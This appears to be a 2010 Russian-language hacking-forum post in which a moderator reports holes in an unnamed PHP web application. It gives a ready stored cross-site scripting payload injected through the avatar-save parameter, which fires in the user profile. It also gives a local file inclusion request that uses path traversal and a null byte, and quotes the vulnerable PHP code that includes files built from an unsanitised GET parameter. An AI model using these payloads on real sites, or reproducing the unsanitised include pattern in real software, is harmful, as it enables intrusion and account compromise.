22.03.2010, 21:55
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Активка:
/index.php?p=avatars&op=save&aid="><script>alert(); </script>&ses_token=ну ваш ses_token,
Потом в профайле срабатывает.
LFI:
Под админом надо быть.
/admin/index.php?op=../../../robots.txt%00
PHP код:
if(!isset($_GET['op']) || trim($_GET['op']) == "") $page = "home";
else $page = $_GET['op'];
strtolower($page);
if(isset($_SESSION['admin']) || $page == 'login') {
define("_AJAX_INCLUDE_", "./ops/".$page."/ajax/ajax.js");
include("./lang/".$lang."/".$page."/default.php");
Много искать не стал, на этом остановился |
|
|